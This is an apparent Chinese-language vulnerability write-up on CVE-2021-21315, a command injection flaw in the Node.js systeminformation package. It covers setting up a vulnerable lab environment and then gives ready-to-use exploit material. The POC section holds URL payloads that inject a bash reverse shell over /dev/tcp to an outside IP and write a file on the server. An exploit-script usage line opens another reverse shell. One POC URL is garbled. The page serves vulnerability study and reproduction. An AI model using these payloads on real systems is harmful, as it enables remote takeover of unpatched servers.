CVE-2021-21315 Node.js 命令sanitize注入漏洞

漏洞概述

Node.js-systeminformation是用于获取各种系统信息的Node.JS模块，它包含多种轻量级功能，可以检索详细的硬件和系统相关信息。自发布至今，systeminformation软件包下载次数近3400万。

2021年02月24日，npm团队发布安全公告，Node.js库中的systeminformation软件包中存在一个命令注入漏洞（CVE-2021-21315），其CVSSv3评分为7.8。

攻击者可以通过在未经过滤的参数中注入Payload来执行系统命令。

漏洞影响

Systeminformation < 5.3.1

环境搭建

漏洞代码

https://github.com/errorecho/CVEs/tree/main/CVE-2021-21315/Env

安装漏洞环境

wget https://nodejs.org/download/release/v12.18.4/node-v12.18.4-linux-x64.tar.xz
tar -xf node-v12.18.4-linux-x64.tar.xz
mv node-v12.18.4-linux-x64 nodejs
mv nodejs/ /usr/local/sbin/
ln -s /usr/local/sbin/nodejs/bin/node /usr/local/bin/
ln -s /usr/local/sbin/nodejs/bin/npm /usr/local/bin/

运行漏洞代码

cd CVE-2021-21315-PoC
node index.js

访问http://127.0.0.1:8000/api/getServices?name=whoami，环境运行成功

漏洞利用

POC

http://127.0.0.1:8000/api/getServices?name[]=$(bash -i >& /dev/tcp/192.168.230.201/1325 0>&1)
http://127.0.0.1:8000yoursite.com/api/getServices?name[]=$(echo -e 'qwe' > pwn.txt)

Exp

exp脚本

https://github.com/errorecho/CVEs/blob/main/CVE-2021-21315/Exp/CVE-2021-21315.py

使用方法

python CVE-2021-21315.py http://127.0.0.1:8000/ "bash -i >& /dev/tcp/127.0.0.1/4242 0>&1"

参考

https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC

上一页CVE-2021-35042 Django QuerySet.order_by() SQL注入漏洞下一页CVE-2021-25646 Apache Druid 远程代码执行漏洞

最后更新于4年前

hashtag漏洞概述

hashtag漏洞影响

hashtag环境搭建

hashtag漏洞利用

hashtagPOC

hashtagExp

hashtag参考

漏洞概述

漏洞影响

环境搭建

漏洞利用

POC

Exp

参考